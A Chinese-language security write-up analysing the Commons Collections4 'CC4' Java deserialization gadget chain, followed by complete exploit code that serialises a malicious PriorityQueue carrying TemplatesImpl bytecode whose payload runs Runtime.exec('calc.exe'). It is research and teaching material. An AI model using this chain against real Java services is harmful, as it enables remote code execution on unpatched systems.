1.前言
这篇文章继续分析commoncollections4利用链,这篇文章是对cc2的改造,和cc3一样,cc3是对cc1的改造,cc4则是对cc2的改造,里面chained的invoke变成了instantiateTransformer,所以不用invoke反射调用方法,所以外层queue里面放的元素随意
缩减版的函数调用栈如下图所示:
2.利用链分析:
调用还是从PriorityQueue.readObject函数开始
一直到org/apache/commons/collections4/comparators/TransformingComparator.class的compare函数中将调用chainedTransformer的transform方法了
这里第一个要利用的还是ConstantTransformer,要返回TrAXfilter类
接下来第二轮将调用Traxfilter类入口参数类型为Templates的构造函数,并且实例化调用该构造函数传入templatesImpl类的实例
接下来到TraxFilter的构造函数中将调用templatesImpl.newTransformer(),就可以是实例化_bytecode中存储的类进行rce了
yso构造分析:
首先构造一个Templates类的实例,然后开始构造chianed链需要的东西,首先就是一个Constanttransformer
然后再构造chained的第二个元素就是该链相对于cc2的区别为InstantiateTransformer类
接下来将两个transformer放进chaind,并且构造外层的PriorityQueue,并将chined放入TransformingComparator,然后再将Templates放到instantiate实例的参数和参数类型中,至此
就构造结束了
手动exp构造:
exp.java
package CommonsCollections4; import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter; import javassist.*; import org.apache.commons.collections4.Transformer; import org.apache.commons.collections4.comparators.ComparableComparator; import org.apache.commons.collections4.comparators.TransformingComparator; import org.apache.commons.collections4.functors.ChainedTransformer; import org.apache.commons.collections4.functors.ConstantTransformer; import org.apache.commons.collections4.functors.InstantiateTransformer; import javax.xml.transform.Templates; import java.io.File; import java.io.FileOutputStream; import java.io.IOException; import java.io.ObjectOutputStream; import java.lang.reflect.Field; import java.util.PriorityQueue; public class exp { public static void main(String[] args) throws IOException, CannotCompileException, ClassNotFoundException, NoSuchFieldException, IllegalAccessException, NotFoundException { TemplatesImpl tmp = new TemplatesImpl(); ClassPool pool = ClassPool.getDefault(); pool.insertClassPath(new ClassClassPath(payload.class)); CtClass pay_class = pool.get(payload.class.getName()); byte[] payCode = pay_class.toBytecode(); Class clazz; clazz =Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"); //存储payload类 Field byteCode = clazz.getDeclaredField("_bytecodes"); byteCode.setAccessible(true); byteCode.set(tmp,new byte[][]{payCode}); Field name = clazz.getDeclaredField("_name"); name.setAccessible(true); name.set(tmp,"tr1ple"); Transformer[] trans = new Transformer[]{ new ConstantTransformer(TrAXFilter.class), new InstantiateTransformer( new Class[]{Templates.class}, new Object[]{tmp}) }; ChainedTransformer chian = new ChainedTransformer(trans); //PriorityQueue<Object> queue = new PriorityQueue(2,new TransformingComparator(chian)); TransformingComparator transCom = new TransformingComparator(chian); PriorityQueue queue = new PriorityQueue(2); queue.add(1); queue.add(1); Field com = PriorityQueue.class.getDeclaredField("comparator"); com.setAccessible(true); com.set(queue,transCom); //序列化 File file; file = new File(System.getProperty("user.dir")+"/javasec-ysoserial/src/main/resources/commonscollections4.ser"); ObjectOutputStream obj_out = new ObjectOutputStream(new FileOutputStream(file)); obj_out.writeObject(queue); } }
readobj.java
package CommonsCollections4; import java.io.*; import java.lang.Runtime; public class readObj { public static void main(String[] args) throws IOException, ClassNotFoundException { File file; file = new File(System.getProperty("user.dir")+"/javasec-ysoserial/src/main/resources/commonscollections4.ser"); ObjectInputStream obj = new ObjectInputStream(new FileInputStream(file)); obj.readObject(); } }
payload.java
package CommonsCollections4; import com.sun.org.apache.xalan.internal.xsltc.DOM; import com.sun.org.apache.xalan.internal.xsltc.TransletException; import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator; import com.sun.org.apache.xml.internal.serializer.SerializationHandler; import java.io.IOException; public class payload extends AbstractTranslet { { try { Runtime.getRuntime().exec("calc.exe"); } catch (IOException e) { e.printStackTrace(); } } public payload(){ System.out.println("tr1ple 2333"); } public void transform(DOM document, SerializationHandler[] handlers) throws TransletException { } public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException { } }